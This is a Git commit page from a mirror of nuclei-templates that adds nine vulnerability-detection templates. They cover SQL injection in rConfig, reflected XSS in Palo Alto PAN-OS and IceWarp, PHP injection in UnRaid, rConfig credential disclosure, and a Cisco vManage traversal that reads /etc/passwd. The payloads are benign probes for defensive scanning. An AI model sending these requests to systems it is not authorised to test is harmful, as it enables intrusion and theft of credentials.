daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #862 from Mad-robot/master 

rConfig 3.9.4 SQLI
patch-1
PD-Team 2021-02-15 03:27:53 +05:30 committed by GitHub
parent 4d8510a60d 86a26f81ec
commit a3dbe4f2f9
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
9 changed files with 190 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

21
cves/2020/CVE-2020-10546.yaml Normal file
View File

@ -0,0 +1,21 @@
id: CVE-2020-10546
info:
name: rConfig 3.9.4 SQLi
author: madrobot
severity: high
reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10546
tags: SQLI
requests:
- method: GET
path:
- "{{BaseURL}}/compliancepolicies.inc.php?search=True&searchColumn=policyName&searchOption=contains&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL+--+"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "[project-discovery]"
part: body

21
cves/2020/CVE-2020-10547.yaml Normal file
View File

@ -0,0 +1,21 @@
id: CVE-2020-10547
info:
name: rConfig 3.9.4 SQLi
author: madrobot
severity: high
reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10547
tags: SQLI
requests:
- method: GET
path:
- "{{BaseURL}}/compliancepolicyelements.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL,NULL+--+&searchColumn=elementName&searchOption=contains"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "[project-discovery]"
part: body

21
cves/2020/CVE-2020-10548.yaml Normal file
View File

@ -0,0 +1,21 @@
id: CVE-2020-10548
info:
name: rConfig 3.9.4 SQLi
author: madrobot
severity: high
reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10548
tags: SQLI
requests:
- method: GET
path:
- "{{BaseURL}}/devices.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL+--+&searchColumn=n.id&searchOption=contains"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "[project-discovery]"
part: body

21
cves/2020/CVE-2020-10549.yaml Normal file
View File

@ -0,0 +1,21 @@
id: CVE-2020-10549
info:
name: rConfig 3.9.4 SQLi
author: madrobot
severity: high
reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10549
tags: SQLI
requests:
- method: GET
path:
- "{{BaseURL}}/snippets.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL+--+&searchColumn=snippetName&searchOption=contains"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "[project-discovery]"
part: body

21
cves/2020/CVE-2020-2036.yaml Normal file
View File

@ -0,0 +1,21 @@
id: CVE-2020-2036
info:
name: Palo Alto Networks Reflected Cross Site Scripting
author: madrobot
severity: medium
reference: https://swarm.ptsecurity.com/swarm-of-palo-alto-pan-os-vulnerabilities/
tags: XSS
requests:
- method: GET
path:
- "{{BaseURL}}/unauth/php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(1)%3E"
- "{{BaseURL}}/php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(1)%3E"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "<svg/onload=alert(1)>"
part: body

21
cves/2020/CVE-2020-27982.yaml Normal file
View File

@ -0,0 +1,21 @@
id: CVE-2020-27982
info:
name: IceWarp WebMail Reflected XSS
author: madrobot
severity: medium
reference: https://packetstormsecurity.com/files/159763/Icewarp-WebMail-11.4.5.0-Cross-Site-Scripting.html
tags: XSS
requests:
- method: GET
path:
- "{{BaseURL}}/webmail/?language=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "<img src=x onerror=alert(1)>"
part: body

21
cves/2020/CVE-2020-5847.yaml Normal file
View File

@ -0,0 +1,21 @@
id: CVE-2020-5847
info:
name: UnRaid Remote Code Execution
author: madrobot
severity: high
reference: https://sysdream.com/news/lab/2020-02-06-cve-2020-5847-cve-2020-5849-unraid-6-8-0-unauthenticated-remote-code-execution-as-root/
tags: Directory Traversal
requests:
- method: GET
path:
- "{{BaseURL}}/webGui/images/green-on.png/?path=x&site[x][text]=%3C?php%20phpinfo();%20?%3E"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "http://www.php.net/"
part: body

22
cves/2020/CVE-2020-9425.yaml Normal file
View File

@ -0,0 +1,22 @@
id: CVE-2020-9425
info:
name: rConfig Unauthenticated Sensitive Information Disclosure
author: madrobot
severity: high
reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9425
tags: Information Disclosure
requests:
- method: GET
path:
- "{{BaseURL}}/settings.php"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "defaultNodeUsername"
- "defaultNodePassword"
part: body

21
cves/2020/CVE-2020–26073.yaml Normal file
View File

@ -0,0 +1,21 @@
id: CVE-202026073
info:
name: Cisco SD-WAN vManage Software Directory Traversal
author: madrobot
severity: high
reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-202026073
tags: Directory Traversal
requests:
- method: GET
path:
- "{{BaseURL}}/dataservice/disasterrecovery/download/token/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2Fetc%2Fpasswd"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
words:
- "root:[x*]:0:0:"
part: body